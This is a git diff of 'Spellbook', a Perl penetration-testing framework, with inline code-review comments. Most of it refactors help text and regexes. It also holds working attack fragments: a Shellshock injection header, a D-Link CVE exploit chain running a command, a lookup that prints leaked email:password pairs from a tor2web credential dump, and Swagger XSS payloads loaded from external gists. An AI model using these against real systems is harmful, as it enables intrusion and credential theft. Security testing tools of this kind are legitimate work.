@@ -36,11 +36,14 @@ package Spellbook::Exploit::DataBreach { } if ($help) { - return " - \rExploit::Databreach - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::Databreach +============== +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } } } diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm index 2949057..9102e89 100755 --- a/lib/Spellbook/Exploit/Django_DEBUG.pm +++ b/lib/Spellbook/Exploit/Django_DEBUG.pm @@ -1,4 +1,4 @@ -package Spellbook::Exploit::Django_Debug { +package Spellbook::Exploit::Django_DEBUG { use strict; use warnings; use Spellbook::Core::UserAgent; @@ -15,7 +15,7 @@ package Spellbook::Exploit::Django_Debug { ); if ($target){ - if ($target !~ /^http(s)?:\/\//){ + if ($target !~ /^http(?:s)?:\/\//x){ $target = "https://$target"; } @@ -32,16 +32,19 @@ package Spellbook::Exploit::Django_Debug { } } } - + return @results } if ($help) { - return " - \rExploit::Django_Debug - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target"; + return<<"EOT"; + +Exploit::Django_Debug +======================= +-h, --help See this menu +-t, --target Define a target"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm index e7d8540..f2d49a5 100644 --- a/lib/Spellbook/Exploit/Fullchain_DLINK.pm +++ b/lib/Spellbook/Exploit/Fullchain_DLINK.pm @@ -7,7 +7,7 @@ package Spellbook::Exploit::Fullchain_DLINK { use Spellbook::Recon::Query_Shodan; use Spellbook::Advisory::CVE_2020_9376; use Spellbook::Advisory::CVE_2020_9377; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $payload, @results); 
@@ -20,23 +20,23 @@ package Spellbook::Exploit::Fullchain_DLINK { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]); if ($credentials) { - my ($username, $password) = split /:/, $credentials; + my ($username, $password) = split /:/x, $credentials; - if (!$password) { + if (!$password) { $password = "admin"; } if ($username) { my $userAgent = LWP::UserAgent->new(); - my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; - + my $login_payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; + my $headers = HTTP::Headers->new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=zwUEueUOvi", @@ -48,16 +48,16 @@ package Spellbook::Exploit::Fullchain_DLINK { "Connection" => "keep-alive" ); - my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload); + my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $login_payload); my $response = $userAgent -> request($request); - - if ($response -> is_success) { + + if ($response -> is_success) { my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ "--target" => $target, "--cookie" => "zwUEueUOvi", "--payload" => "uname -a" ]); - + if ($exploit[0] ne "Authenication fail") { push @results, @exploit; } @@ -69,12 +69,15 @@ package Spellbook::Exploit::Fullchain_DLINK { } if ($help) { - return " - \rExploit::Fullchain_DLINK - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-p, --payload Send a command\n\n"; + return<<"EOT"; + +Exploit::Fullchain_DLINK +======================= +-h, --help See this menu +-t, --target Define a target +-p, --payload Send a command\n\n"; + +EOT } return 0; 
diff --git a/lib/Spellbook/Exploit/HAProxy_Exposed.pm b/lib/Spellbook/Exploit/HAProxy_Exposed.pm index b40ca6c..1ccdb33 100644 --- a/lib/Spellbook/Exploit/HAProxy_Exposed.pm +++ b/lib/Spellbook/Exploit/HAProxy_Exposed.pm @@ -1,7 +1,7 @@ package Spellbook::Exploit::HAProxy_Exposed { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,14 +14,17 @@ package Spellbook::Exploit::HAProxy_Exposed { if ($target) { return @result; - } + } if ($help) { - return " - \rExploit::HAProxy_Exposed - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Exploit::HAProxy_Exposed +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Headers_Misconfig.pm b/lib/Spellbook/Exploit/Headers_Misconfig.pm index fa75e01..168352c 100644 --- a/lib/Spellbook/Exploit/Headers_Misconfig.pm +++ b/lib/Spellbook/Exploit/Headers_Misconfig.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Headers_Misconfig { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -35,16 +35,19 @@ package Spellbook::Exploit::Headers_Misconfig { push @results, "$target don't have $header header."; } } - + return @results; } if ($help) { - return " - \rExploit::Headers_Misconfig - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::Headers_Misconfig +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Mixed_Content.pm b/lib/Spellbook/Exploit/Mixed_Content.pm index c54967a..211bfbc 100644 --- a/lib/Spellbook/Exploit/Mixed_Content.pm +++ b/lib/Spellbook/Exploit/Mixed_Content.pm 
@@ -2,7 +2,7 @@ package Spellbook::Exploit::Mixed_Content { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result, @urls); @@ -15,18 +15,18 @@ package Spellbook::Exploit::Mixed_Content { if ($target) { if ($target =~ /^http:\/\//x) { - $target =~ s/^http:\/\///x; + $target =~ s/^http:\/\///x; } - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new (); my $request = $userAgent -> get($target); for (($request -> content =~ /src="([^"]+)"/gx) || ($request -> content =~ /href="([^"]+)"/gx)){ - push @urls, $1; + push @urls, $1; } foreach my $url (@urls) { @@ -36,15 +36,17 @@ package Spellbook::Exploit::Mixed_Content { } return @result; - } + } if ($help) { - return " - \rExploit::Mixed_Content - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target to perform the analysis\n - "; + return<<"EOT"; + +Exploit::Mixed_Content +===================== +-h, --help See this menu +-t, --target Define a target to perform the analysis\n; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/None_Attack.pm b/lib/Spellbook/Exploit/None_Attack.pm index dfc794b..4ae6efe 100644 --- a/lib/Spellbook/Exploit/None_Attack.pm +++ b/lib/Spellbook/Exploit/None_Attack.pm @@ -1,8 +1,8 @@ package Spellbook::Exploit::None_Attack { use strict; use warnings; - - sub new { + + sub new { my ($self, $parameters) = @_; my ($help, @result); @@ -13,13 +13,16 @@ package Spellbook::Exploit::None_Attack { if (1) { return @result; - } + } if ($help) { - return " - \rExploit::None_Attack - \r===================== - \r-h, --help See this menu\n\n"; + return<<"EOT"; + +Exploit::None_Attack +===================== +-h, --help See this menu\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Pwn_DB.pm b/lib/Spellbook/Exploit/Pwn_DB.pm index a3a976b..64fa9a8 100644 
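Review bot: In the Mixed_Content hunk at -15,18 the `for` loop pushes `$1` instead of the loop variable, and the `||` puts the `src` match in scalar context, so at most one distinct URL is ever collected and `href` values are only looked at when the page has no `src` attribute at all. For a mixed-content audit that means most resources on a page go unchecked. Collecting the captures directly avoids both problems: `push @urls, $request->content =~ /(?:src|href)="([^"]+)"/gx;`. The `for` line itself is unchanged context in this hunk; only the `push` line was re-indented.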
--- a/lib/Spellbook/Exploit/Pwn_DB.pm +++ b/lib/Spellbook/Exploit/Pwn_DB.pm @@ -17,7 +17,7 @@ package Spellbook::Exploit::Pwn_DB { if ($target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> post( - "https://pwndb2am4tzkvold.tor2web.io/", + "https://pwndb2am4tzkvold.tor2web.io/", Content => "luser=&domain=$target&luseropr=0&domainopr=0&submitform=em" ); @@ -29,19 +29,21 @@ package Spellbook::Exploit::Pwn_DB { while ($content =~ /\[luser\] => ([^\n]+)[^\)]+\[password\] => ([^\n]+)/mgx) { if ($1 ne "donate") { print "$1\@$target:$2\n"; - } + } } - } + } } } - + if ($help) { - return " - \rExploit::Pwn_DB - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n - "; + return<<"EOT"; + +Exploit::Pwn_DB +======================= +-h, --help See this menu +-t, --target Define a target\n; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Redis_Unauth.pm b/lib/Spellbook/Exploit/Redis_Unauth.pm index afb0625..a055494 100644 --- a/lib/Spellbook/Exploit/Redis_Unauth.pm +++ b/lib/Spellbook/Exploit/Redis_Unauth.pm @@ -3,7 +3,7 @@ package Spellbook::Exploit::Redis_Unauth { use warnings; use Redis; use Try::Tiny; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -21,27 +21,30 @@ package Spellbook::Exploit::Redis_Unauth { try { my $redis = Redis -> new ( - server => $target, + server => $target, name => "Spellbook", cnx_timeout => 45 ); - + my $requirepass = $redis -> config_get ("requirepass") -> [1]; - + if (!defined($requirepass) || $requirepass eq "") { push @result, $target; } }; return @result; - } + } if ($help) { - return " - \rExploit::Redis_Exposed - \r===================== - \r-h, --help See this menu - \r-t, --target Set a target to detect misconfigurations\n\n"; + return<<"EOT"; + +Exploit::Redis_Exposed +===================== +-h, --help See this menu +-t, --target Set a target to detect misconfigurations\n\n"; + +EOT } return 0; 
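Review bot: The `try { ... };` block in the Redis_Unauth hunk at -21,27 has no `catch`, so a refused connection, a timeout, or an error raised by `config_get` presumably all end in the same empty `@result` as a server that has `requirepass` set. Anyone using this as a configuration audit cannot tell "checked and protected" from "never reached". Closing the block with `} catch { warn "Redis check for $target failed: $_"; };` would surface the difference without changing the return value. The help header in the same hunk also says `Exploit::Redis_Exposed` while the package is `Redis_Unauth`.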
diff --git a/lib/Spellbook/Exploit/Reflected_XSS.pm b/lib/Spellbook/Exploit/Reflected_XSS.pm index 59beaad..2e66736 100644 --- a/lib/Spellbook/Exploit/Reflected_XSS.pm +++ b/lib/Spellbook/Exploit/Reflected_XSS.pm @@ -31,7 +31,7 @@ package Spellbook::Exploit::Reflected_XSS { $params -> remove($name); $params -> append($name, $payload); - + $parsed_url -> query($params); try { @@ -47,16 +47,19 @@ package Spellbook::Exploit::Reflected_XSS { } } } - + return @result; } if ($help) { - return " - \rExploit::Reflected_XSS - \r===================== - \r-h, --help See this menu - \r-t, --target Set an website to see paths from WayBackMachine\n"; + return<<"EOT"; + +Exploit::Reflected_XSS +===================== +-h, --help See this menu +-t, --target Set an website to see paths from WayBackMachine\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm index 2a353b1..60cce59 100644 --- a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm +++ b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm @@ -14,7 +14,7 @@ package Spellbook::Exploit::S3_Bucket_Takeover { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -29,14 +29,17 @@ package Spellbook::Exploit::S3_Bucket_Takeover { } return @result; - } + } if ($help) { - return " - \rExploit::S3_Bucket_Takeover - \r===================== - \r-h, --help See this menu - \r-t, --target Check the possibility to takeover an s3 resource\n"; + return<<"EOT"; + +Exploit::S3_Bucket_Takeover +===================== +-h, --help See this menu +-t, --target Check the possibility to takeover an s3 resource\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Shellshock.pm b/lib/Spellbook/Exploit/Shellshock.pm index 3b2e4a9..870e30f 100644 --- a/lib/Spellbook/Exploit/Shellshock.pm +++ b/lib/Spellbook/Exploit/Shellshock.pm 
@@ -19,7 +19,7 @@ package Spellbook::Exploit::Shellshock { agent => "() { :; }; echo; echo; /bin/bash -c 'ls'" ); - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -31,12 +31,15 @@ package Spellbook::Exploit::Shellshock { } if ($help) { - return " - \rExploit::Shellshock - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target - \r-c, --command Define a command to delivery\n\n"; + return<<"EOT"; + +Exploit::Shellshock +===================== +-h, --help See this menu +-t, --target Define a target +-c, --command Define a command to delivery\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Subdomain_Takeover.pm b/lib/Spellbook/Exploit/Subdomain_Takeover.pm index 1b1832a..43e250e 100644 --- a/lib/Spellbook/Exploit/Subdomain_Takeover.pm +++ b/lib/Spellbook/Exploit/Subdomain_Takeover.pm 
@@ -9,65 +9,71 @@ package Spellbook::Exploit::Subdomain_Takeover { my ($self, $parameters) = @_; my ($help, $target, @results); - Getopt::Long::GetOptionsFromArray ( + my %service_fingerprints = ( + "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", + "1eb970ce5a18bec7165f016df8238566" => "github.github.io", + "387caa8a924c5f92496824494b929207" => "heroku.com", + "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", + "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", + "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", + "308be540e2821668fb15c42317b1a256" => "wpengine.com", + "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", + "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", + "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", + "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", + ); + + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($target) { - $target =~ s/^http(s)?:\/\///x; - - my $resolv = Net::DNS::Resolver -> new(); - my $reply = $resolv -> search($target); - - if ($reply) { - $target = "https://$target"; - - foreach my $rr ($reply -> answer()) { - if ($rr -> can("cname")) { - my %hashes = ( - "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", - "1eb970ce5a18bec7165f016df8238566" => "github.github.io", - "387caa8a924c5f92496824494b929207" => "heroku.com", - "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", - "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", - "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", - "308be540e2821668fb15c42317b1a256" => "wpengine.com", - "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", - "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", - "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", - "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", - # "9043fb5164b8a1a5fea8031025fe9ef8" => "firebase", - # 
"648e671c67c7aee4eae2918e7cfbf5e4" => "squarespace.com" - ); - - foreach (%hashes) { - if ($rr -> cname() =~ m/$_/x) { - my $useragent = Spellbook::Core::UserAgent -> new(); - my $request = $useragent -> get($target); - - if ($request -> code() == 200 || $request -> code() == 404) { - my $md5 = md5_hex($request -> content()); - - return @results, $target if $hashes{$md5}; - } - } - } + if ($help) { + return <<"EOT"; + +Exploit::Subdomain_Takeover_Check +============== +-h, --help See this menu +-t, --target Define a target + +EOT + } + + return @results unless $target; + + $target =~ s/^http(s)?:\/\///x; + + my $resolv = Net::DNS::Resolver->new(); + my $reply = $resolv->search($target); + + return @results unless $reply; + + $target = "https://$target"; + + foreach my $dns_resource ($reply->answer()) { + next unless $dns_resource->can("cname"); + + my $cname = $dns_resource->cname(); + + while (my ($hash, $service) = each %service_fingerprints) { + next unless $cname =~ m/$service/x; + + my $useragent = Spellbook::Core::UserAgent->new(); + my $response = $useragent->get($target); + + if ($response->code() == 200 || $response->code() == 404) { + my $content_hash = md5_hex($response->content()); + + if ($hash eq $content_hash) { + push @results, $target; + last; } } } - - return @results; } - if ($help) { - return " - \rExploit::Subdomain_Takeover_Check - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; - } + return @results; } } diff --git a/lib/Spellbook/Exploit/Swagger_XSS.pm b/lib/Spellbook/Exploit/Swagger_XSS.pm index 4fd032c..4972d0c 100644 --- a/lib/Spellbook/Exploit/Swagger_XSS.pm +++ b/lib/Spellbook/Exploit/Swagger_XSS.pm 
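Review bot: In the rewritten Subdomain_Takeover loop, `last` leaves the `each %service_fingerprints` iterator part-way through the hash, and Perl does not reset it when the `while` is entered again for the next answer record, so later CNAMEs are compared against only the remaining entries. Iterating with `for my $hash (keys %service_fingerprints)` and reading `$service_fingerprints{$hash}` inside avoids the shared iterator. The service name is also interpolated as a pattern in `m/$service/x`, where each `.` matches any character; `m/\Q$service\E/` keeps the comparison literal and avoids false matches. Separately, this hunk still uses the capturing `http(s)?` that the rest of the commit replaces with `(?:s)`.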
@@ -1,71 +1,67 @@ package Spellbook::Exploit::Swagger_XSS { + use strict; use warnings; use Spellbook::Core::UserAgent; sub new { my ($self, $parameters) = @_; - my ($help, $target, @result); + my ($help, $target, @vulnerable_endpoints); - Getopt::Long::GetOptionsFromArray ( + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; - } - - $target =~ s/\/$//x; - my $useragent = Spellbook::Core::UserAgent -> new(); - - my @paths = ( - "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", "/api/swagger", "/api/swagger-ui", "/api/swagger.json", - "/api/v2/api-docs", "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", "/docs/v2/api-docs", - "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", - "/api/v2/swagger-ui.html", "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" - ); - - foreach my $path (@paths) { - my $request = $useragent -> get("$target$path"); - - if ($request -> code() == 200) { - if ($request -> content() =~ /(.*)<\/title>/x) { - my $title = $1; - - if ($title =~ /Swagger UI/x) { - my @payloads = ( - "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", - "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" - ); - - foreach my $payload (@payloads) { - my $endpoint = $target . $path . 
$payload; - my $request = $useragent -> get($endpoint); - - if ($request -> code() == 200) { - push @result, $endpoint; - } - } - } - } - } - } + if ($help) { + return <<"EOT"; +Exploit::Swagger_XSS +===================== +-h, --help See this menu +-t, --target Set a target - return @result; +EOT } - if ($help) { - return " - \rExploit::Swagger_XSS - \r===================== - \r-h, --help See this menu - \r-t, --target Set a target\n\n"; + return 0 unless $target; + + $target = "https://$target" unless $target =~ /^http(?:s)?:\/\//x; + $target =~ s/\/$//x; + + my $useragent = Spellbook::Core::UserAgent->new(); + + my @paths = ( + "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", + "/api/swagger", "/api/swagger-ui", "/api/swagger.json", "/api/v2/api-docs", + "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", + "/docs/v2/api-docs", "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", + "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", "/api/v2/swagger-ui.html", + "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" + ); + + my @payloads = ( + "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", + "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" + ); + + foreach my $path (@paths) { + my $base_url = "$target$path"; + my $initial_response = $useragent->get($base_url); + + next unless $initial_response->code() == 200; + next unless $initial_response->content() =~ /<title>(.*)<\/title>/x; + next unless $1 =~ /Swagger UI/; + + foreach my $payload (@payloads) { + my $test_url = $base_url . $payload; + my $test_response = $useragent->get($test_url); + + push @vulnerable_endpoints, $test_url if $test_response->code() == 200; + } } - - return 0; + + return @vulnerable_endpoints; } } 
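Review bot: The results are now named `@vulnerable_endpoints`, but the only test applied to each payload URL is `$test_response->code() == 200`, which a static Swagger UI page will normally satisfy whatever query string is appended. The behaviour being probed happens in the browser, so the server's status code cannot confirm it, and every detected Swagger UI would be reported once per payload. Naming the list for what it holds, for example `@candidate_endpoints`, and stating in the help text that findings need manual confirmation would keep reports honest. Also, `Getopt::Long` is called fully qualified but this file, shown from line 1, has no `use Getopt::Long;`, so it appears to rely on another module having loaded it.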
diff --git a/lib/Spellbook/Exploit/Upload_Via_PUT.pm b/lib/Spellbook/Exploit/Upload_Via_PUT.pm index 53a4f67..6829372 100644 --- a/lib/Spellbook/Exploit/Upload_Via_PUT.pm +++ b/lib/Spellbook/Exploit/Upload_Via_PUT.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Upload_Via_PUT { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -32,11 +32,14 @@ package Spellbook::Exploit::Upload_Via_PUT { } if ($help) { - return " - \rRecon::Explioit - \r===================== - \r-h, --help See this menu - \r-t, --target Define\n\n"; + return<<"EOT"; + +Recon::Explioit +===================== +-h, --help See this menu +-t, --target Define\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/CDN_Checker.pm b/lib/Spellbook/Helper/CDN_Checker.pm index 686884c..caa1bd5 100644 --- a/lib/Spellbook/Helper/CDN_Checker.pm +++ b/lib/Spellbook/Helper/CDN_Checker.pm 
@@ -7,54 +7,52 @@ package Spellbook::Helper::CDN_Checker { use Spellbook::Recon::Get_IP; sub new { - my ($self, $parameters) = @_; - my ($help, $target, @result); + my ($self, $parameters) = @_; + my ($help, $target, @result); - Getopt::Long::GetOptionsFromArray ( - $parameters, - "h|help" => \$help, - "t|target=s" => \$target - ); + Getopt::Long::GetOptionsFromArray ( + $parameters, + "h|help" => \$help, + "t|target=s" => \$target + ); + + return <<"EOT" if $help; + +Helper::CDN_Checker +===================== +-h, --help See this menu +-t --target Define a target\n\n"; + +EOT + + return 0 unless $target; - if ($target) { my $ip = Spellbook::Recon::Get_IP -> new (["--target" => $target]); + return 0 unless $ip; + + my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; + my $useragent = Spellbook::Core::UserAgent -> new (); + my $request = $useragent -> get($cnd_list); + + return 0 unless $request->code == 200; - if ($ip) { - my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; - my $useragent = Spellbook::Core::UserAgent -> new (); - my $request = $useragent -> get($cnd_list); - - if ($request -> code == 200) { - my $data = decode_json($request -> content); - my $content = $data -> {"cdn"}; # we have others options - - for (keys %{$content}) { - for (@{$content -> {$_}}) { - my $range = Net::IP -> new($_); - my $value = Net::IP -> new($ip); - my $match = $range -> overlaps($value); - - if ($match) { - push @result, $target; - } - } + my $data = decode_json($request -> content); + my $content = $data -> {"cdn"}; # we have others options + + my $target_ip = Net::IP->new($ip); + + for my $provider (keys %{$content}) { + for my $range (@{$content->{$provider}}) { + my $cdn_range = Net::IP->new($range); + if ($cdn_range->overlaps($target_ip)) { + push @result, $target; + return @result; } } } return @result; } - - if ($help) { - return " - 
\rHelper::CDN_Checker - \r===================== - \r-h, --help See this menu - \r-t --target Define a target\n\n"; - } - - return 0; - } } 1; \ No newline at end of file diff --git a/lib/Spellbook/Helper/Exifs_Write.pm b/lib/Spellbook/Helper/Exifs_Write.pm index ea7fb0b..efe40a5 100755 --- a/lib/Spellbook/Helper/Exifs_Write.pm +++ b/lib/Spellbook/Helper/Exifs_Write.pm @@ -44,12 +44,15 @@ package Spellbook::Helper::Exifs_Write { } if ($help) { - return " - \rHelper::Exifs_Write - \r===================== - \r-h, --help See this menu - \r-f, --file Define a file write the payload - \r-p --payload Set a payload to write into file\n\n"; + return<<"EOT"; + +Helper::Exifs_Write +===================== +-h, --help See this menu +-f, --file Define a file write the payload +-p --payload Set a payload to write into file\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Generate_UUID.pm b/lib/Spellbook/Helper/Generate_UUID.pm index eeb9157..e80b5c6 100644 --- a/lib/Spellbook/Helper/Generate_UUID.pm +++ b/lib/Spellbook/Helper/Generate_UUID.pm @@ -19,20 +19,23 @@ package Spellbook::Helper::Generate_UUID { if ($version) { for (my $i = 1; $i <= $repeat; $i++) { my $generate = create_uuid_as_string($version); - + push @result, $generate; } - + return @result; } if ($help) { - return " - \rHelper::Generate_UUID - \r===================== - \r-h, --help See this menu - \r-v, --version Version of UUID algorithm - \r-r, --repeat Quantities of repetitions\n\n"; + return<<"EOT"; + +Helper::Generate_UUID +===================== +-h, --help See this menu +-v, --version Version of UUID algorithm +-r, --repeat Quantities of repetitions\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Host_Normalization.pm b/lib/Spellbook/Helper/Host_Normalization.pm index a786063..cf234e4 100644 --- a/lib/Spellbook/Helper/Host_Normalization.pm +++ b/lib/Spellbook/Helper/Host_Normalization.pm 
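Review bot: `Net::IP->new` returns undef when it cannot parse its argument, and the new inner loop in CDN_Checker calls `$cdn_range->overlaps($target_ip)` without checking, so a single malformed or unexpected entry in the downloaded list would abort the whole lookup with a method call on undef. `my $cdn_range = Net::IP->new($range) or next;` keeps the scan going, and `$target_ip` deserves the same check before the loops. The list is fetched from the `main` branch of a third-party repository on every call and passed straight to `decode_json`, which dies on malformed input. Wrapping the decode in `eval` and returning 0 on failure would match the other early returns in this hunk.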
@@ -14,7 +14,7 @@ package Spellbook::Helper::Host_Normalization { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -34,11 +34,14 @@ package Spellbook::Helper::Host_Normalization { } if ($help) { - return " - \rHelper::Host_Normalization - \r========================== - \r-h, --help See this menu - \r-t, --target Define a target to normalize\n\n"; + return<<"EOT"; + +Helper::Host_Normalization +========================== +-h, --help See this menu +-t, --target Define a target to normalize\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Permutations.pm b/lib/Spellbook/Helper/Permutations.pm index cc615cd..1344ab5 100644 --- a/lib/Spellbook/Helper/Permutations.pm +++ b/lib/Spellbook/Helper/Permutations.pm @@ -25,20 +25,23 @@ package Spellbook::Helper::Permutations { $chars[$i] = $chars[$random]; $chars[$random] = $temp; } - + push @result, join("", @chars); } - - return @result; + + return @result; } if ($help) { - return " - \rHelper::Permutations - \r===================== - \r-h, --help See this menu - \r-v, --value Provide a seed - \r-r, --repeat Quantities of repetitions\n\n"; + return<<"EOT"; + +Helper::Permutations +===================== +-h, --help See this menu +-v, --value Provide a seed +-r, --repeat Quantities of repetitions\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Read_File.pm b/lib/Spellbook/Helper/Read_File.pm index a0c7ac8..cc39cba 100644 --- a/lib/Spellbook/Helper/Read_File.pm +++ b/lib/Spellbook/Helper/Read_File.pm @@ -2,12 +2,13 @@ package Spellbook::Helper::Read_File { use strict; use warnings; use Spellbook::Core::Module; + use Carp qw(croak); sub new { - my ($self, $parameters)= @_; + my ($self, $parameters) = @_; my ($help, $file, $entrypoint, @result); - Getopt::Long::GetOptionsFromArray ( + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "f|file=s" => \$file, 
@@ -15,36 +16,36 @@ package Spellbook::Helper::Read_File { ); if ($file) { - open (my $filename, "<", $file); + local $/ = "\n"; + open my $fh, "<", $file or croak "Failed to open file: $!"; + my @lines = <$fh>; + close $fh; - while (<$filename>) { - chomp ($_); + for my $line (@lines) { + chomp($line); if ($entrypoint) { - my $return = Spellbook::Core::Module -> new ($entrypoint, ["--target" => $_]); - + my $return = Spellbook::Core::Module->new($entrypoint, ["--target" => $line]); if ($return) { - push @result, $_; + push @result, $line; } } - else { - push @result, $_; + push @result, $line; } } - - close ($filename); - return @result; } - - return " - \rHelper::Read_File - \r===================== - \r-h, --help See this menu - \r-f, --file Define a file to read - \r-e, --entrypoint Set a other module to send the output\n\n"; + return <<"EOT"; + +Helper::Read_File +===================== +-h, --help See this menu +-f, --file Define a file to read +-e, --entrypoint Set a other module to send the output + +EOT } } diff --git a/lib/Spellbook/Helper/Reverse_Shell.pm b/lib/Spellbook/Helper/Reverse_Shell.pm index 5e7c3ae..e5a22d1 100644 --- a/lib/Spellbook/Helper/Reverse_Shell.pm +++ b/lib/Spellbook/Helper/Reverse_Shell.pm @@ -6,7 +6,7 @@ package Spellbook::Helper::Reverse_Shell { sub new { my ($self, $parameters) = @_; my ($help, $target); - + my $port = 1337; my $lang = "perl"; 
